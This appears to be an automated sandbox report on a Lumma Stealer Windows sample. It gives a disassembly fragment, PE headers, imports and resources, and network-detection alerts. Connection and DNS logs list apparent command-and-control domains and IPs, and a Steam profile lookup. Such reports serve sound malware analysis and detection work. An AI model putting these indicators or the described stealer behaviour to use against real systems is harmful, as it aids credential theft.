                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                push esi
                                                                                                                                                                                                                push edi
                                                                                                                                                                                                                mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                                mov eax, dword ptr [edi+04h]
                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                je 00007F8F18EE7FF9h
                                                                                                                                                                                                                lea edx, dword ptr [eax+08h]
                                                                                                                                                                                                                cmp byte ptr [edx], 00000000h
                                                                                                                                                                                                                je 00007F8F18EE7FF1h
                                                                                                                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                mov ecx, dword ptr [esi+04h]
                                                                                                                                                                                                                cmp eax, ecx
                                                                                                                                                                                                                je 00007F8F18EE7FC6h
                                                                                                                                                                                                                add ecx, 08h
                                                                                                                                                                                                                push ecx
                                                                                                                                                                                                                push edx
                                                                                                                                                                                                                call 00007F8F18EEC5BFh
                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                je 00007F8F18EE7FB6h
                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                jmp 00007F8F18EE7FD6h
                                                                                                                                                                                                                test byte ptr [esi], 00000002h
                                                                                                                                                                                                                je 00007F8F18EE7FB7h
                                                                                                                                                                                                                test byte ptr [edi], 00000008h
                                                                                                                                                                                                                je 00007F8F18EE7FA4h
                                                                                                                                                                                                                mov eax, dword ptr [ebp+10h]
                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                test al, 01h
                                                                                                                                                                                                                je 00007F8F18EE7FB7h
                                                                                                                                                                                                                test byte ptr [edi], 00000001h
                                                                                                                                                                                                                je 00007F8F18EE7F96h
                                                                                                                                                                                                                test al, 02h
                                                                                                                                                                                                                je 00007F8F18EE7FB7h
                                                                                                                                                                                                                test byte ptr [edi], 00000002h
                                                                                                                                                                                                                je 00007F8F18EE7F8Dh
                                                                                                                                                                                                                xor eax, eax
                                                                                                                                                                                                                inc eax
                                                                                                                                                                                                                pop edi
                                                                                                                                                                                                                pop esi
                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                ret
                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                                                                cmp eax, 00004F4Dh
                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                • [LNK] VS2008 build 21022
                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x562180x64.text
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x3b68.rsrc
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2db80x40.text
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x1c0.text
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                .text0x10000x55c7e0x55e00e2ff3a4fb28c146775d97f63218ae5a2False0.6258358351528385data6.289189405612633IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .data0x570000xaba80x6000eab541c7174eadb7aad46e6a4821d981False0.08064778645833333data0.945377773203018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                .rsrc0x620000x3b680x3c00f8c097bfd1c2ec013c6386c296a04b38False0.443359375data3.9464645575078805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.532258064516129
                                                                                                                                                                                                                RT_ICON0x622100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.532258064516129
                                                                                                                                                                                                                RT_ICON0x628d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.41120331950207467
                                                                                                                                                                                                                RT_ICON0x628d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.41120331950207467
                                                                                                                                                                                                                RT_ICON0x64e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.44769503546099293
                                                                                                                                                                                                                RT_ICON0x64e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.44769503546099293
                                                                                                                                                                                                                RT_STRING0x655700x144dataTamilIndia0.5370370370370371
                                                                                                                                                                                                                RT_STRING0x655700x144dataTamilSri Lanka0.5370370370370371
                                                                                                                                                                                                                RT_STRING0x656b80x4aadataTamilIndia0.44472361809045224
                                                                                                                                                                                                                RT_STRING0x656b80x4aadataTamilSri Lanka0.44472361809045224
                                                                                                                                                                                                                RT_ACCELERATOR0x653180x50dataTamilIndia0.825
                                                                                                                                                                                                                RT_ACCELERATOR0x653180x50dataTamilSri Lanka0.825
                                                                                                                                                                                                                RT_GROUP_ICON0x652e80x30dataTamilIndia0.9375
                                                                                                                                                                                                                RT_GROUP_ICON0x652e80x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                RT_VERSION0x653680x204data0.5445736434108527
                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                KERNEL32.dllEnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, GetLogicalDriveStringsW, InterlockedCompareExchange, WriteConsoleInputA, SetComputerNameW, FreeEnvironmentStringsA, GetModuleHandleW, EnumCalendarInfoExW, EscapeCommFunction, GetCurrencyFormatA, EnumTimeFormatsA, TlsSetValue, GetVolumeInformationA, LoadLibraryW, GetCalendarInfoW, SetVolumeMountPointA, FindNextVolumeW, GetFileAttributesW, SetComputerNameExW, FindNextVolumeMountPointW, GetDevicePowerState, InterlockedIncrement, VerifyVersionInfoW, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, BackupWrite, CreateJobSet, CopyFileA, GetTempFileNameA, LoadLibraryA, SetCalendarInfoW, EnumDateFormatsA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetShortPathNameW, GetVersionExA, GetDiskFreeSpaceExW, ReadConsoleInputW, SetFileAttributesW, LCMapStringA, GetComputerNameA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, TerminateProcess, IsDebuggerPresent, HeapFree, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, SetFilePointer, CloseHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, RaiseException, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WideCharToMultiByte, InitializeCriticalSectionAndSpinCount, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetModuleHandleA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
                                                                                                                                                                                                                ADVAPI32.dllReadEventLogW
                                                                                                                                                                                                                ole32.dllCoSuspendClassObjects
                                                                                                                                                                                                                WINHTTP.dllWinHttpCheckPlatform
                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                TamilIndia
                                                                                                                                                                                                                TamilSri Lanka
                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                2024-12-13T18:52:05.352965+01002058039ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brendon-sharjen .biz)1192.168.2.4554391.1.1.153UDP
                                                                                                                                                                                                                2024-12-13T18:52:07.012813+01002058040ET MALWARE Observed Win32/Lumma Stealer Related Domain (brendon-sharjen .biz in TLS SNI)1192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:07.012813+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:07.740970+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:07.740970+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:09.293460+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.22.222443TCP
                                                                                                                                                                                                                2024-12-13T18:52:10.020240+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.22.222443TCP
                                                                                                                                                                                                                2024-12-13T18:52:10.020240+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.22.222443TCP
                                                                                                                                                                                                                2024-12-13T18:52:11.588142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:12.328476+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:12.328476+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.32.1443TCP
                                                                                                                                                                                                                2024-12-13T18:52:15.371835+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973323.55.153.106443TCP
                                                                                                                                                                                                                2024-12-13T18:52:16.289176+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.44973323.55.153.106443TCP
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.739778042 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.739859104 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.739979029 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.743164062 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.743182898 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.012684107 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.012813091 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.017875910 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.017890930 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.018173933 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.071985006 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.091283083 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.091309071 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.091404915 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.740994930 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.741096020 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.741179943 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.743196011 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.743216991 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.743230104 CET49730443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.743235111 CET44349730104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.065829039 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.065885067 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.066087008 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.066411018 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.066428900 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.293340921 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.293459892 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.333875895 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.333906889 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.334610939 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.350548029 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.350579977 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:09.350682020 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020309925 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020550013 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020639896 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020692110 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020719051 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020734072 CET49731443192.168.2.4104.21.22.222
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.020740032 CET44349731104.21.22.222192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.364279985 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.364325047 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.364445925 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.365715027 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.365727901 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.588051081 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.588141918 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.592721939 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.592741013 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.593100071 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.595747948 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.595779896 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:11.595825911 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.328552961 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.328795910 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.328862906 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.328977108 CET49732443192.168.2.4104.21.32.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.328994989 CET44349732104.21.32.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.976902962 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.976954937 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.977168083 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.978451014 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.978478909 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.371539116 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.371834993 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.373733044 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.373747110 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.374056101 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.375808001 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:15.419341087 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289211035 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289237022 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289279938 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289288998 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289305925 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289352894 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.289385080 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.465384007 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.465441942 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.465538025 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.465554953 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.465605021 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.503576994 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.503623009 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.503664017 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.503701925 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.503750086 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.504096031 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.504117966 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.504129887 CET49733443192.168.2.423.55.153.106
                                                                                                                                                                                                                Dec 13, 2024 18:52:16.504138947 CET4434973323.55.153.106192.168.2.4
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.352965117 CET5543953192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET53554391.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.753819942 CET6132553192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.064440012 CET53613251.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.039299965 CET6442453192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET53644241.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.330790997 CET4977953192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.563797951 CET53497791.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.603447914 CET6321353192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.826731920 CET53632131.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.828140020 CET5875253192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.053798914 CET53587521.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.058008909 CET6090153192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.386074066 CET53609011.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.389430046 CET5087853192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.610142946 CET53508781.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.613162041 CET5283153192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.834634066 CET53528311.1.1.1192.168.2.4
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.837630033 CET4984353192.168.2.41.1.1.1
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.975923061 CET53498431.1.1.1192.168.2.4
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.352965117 CET192.168.2.41.1.1.10x5bb7Standard query (0)brendon-sharjen.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:07.753819942 CET192.168.2.41.1.1.10xc502Standard query (0)immureprech.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.039299965 CET192.168.2.41.1.1.10x52f8Standard query (0)deafeninggeh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.330790997 CET192.168.2.41.1.1.10xdcd7Standard query (0)effecterectz.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.603447914 CET192.168.2.41.1.1.10xede1Standard query (0)diffuculttan.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.828140020 CET192.168.2.41.1.1.10xd383Standard query (0)debonairnukk.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.058008909 CET192.168.2.41.1.1.10x1febStandard query (0)wrathful-jammy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.389430046 CET192.168.2.41.1.1.10x504aStandard query (0)awake-weaves.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.613162041 CET192.168.2.41.1.1.10xbb89Standard query (0)sordid-snaked.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.837630033 CET192.168.2.41.1.1.10xeb20Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:05.734342098 CET1.1.1.1192.168.2.40x5bb7No error (0)brendon-sharjen.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.064440012 CET1.1.1.1192.168.2.40xc502No error (0)immureprech.biz104.21.22.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:08.064440012 CET1.1.1.1192.168.2.40xc502No error (0)immureprech.biz172.67.207.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:10.363301992 CET1.1.1.1192.168.2.40x52f8No error (0)deafeninggeh.biz104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.563797951 CET1.1.1.1192.168.2.40xdcd7Name error (3)effecterectz.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:12.826731920 CET1.1.1.1192.168.2.40xede1Name error (3)diffuculttan.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.053798914 CET1.1.1.1192.168.2.40xd383Name error (3)debonairnukk.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.386074066 CET1.1.1.1192.168.2.40x1febName error (3)wrathful-jammy.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.610142946 CET1.1.1.1192.168.2.40x504aName error (3)awake-weaves.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.834634066 CET1.1.1.1192.168.2.40xbb89Name error (3)sordid-snaked.cyounonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                Dec 13, 2024 18:52:13.975923061 CET1.1.1.1192.168.2.40xeb20No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                • brendon-sharjen.biz
                                                                                                                                                                                                                • immureprech.biz
